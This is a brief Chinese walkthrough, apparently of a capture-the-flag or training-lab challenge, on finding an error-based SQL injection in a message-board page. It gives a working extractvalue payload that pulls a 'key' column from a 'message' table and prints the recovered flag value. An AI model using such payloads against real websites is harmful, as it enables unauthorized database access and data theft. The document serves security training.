1、 打开链接界面,可以自行测试留言
2、 提交留言,查看网页源代码
3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。
4、 payload
and extractvalue(1,concat(0x5c,(SELECT concat_ws(':', `key`) FROM message limit 0,1)))
Key的值:mozheceee2f22a023a3667f31edaaac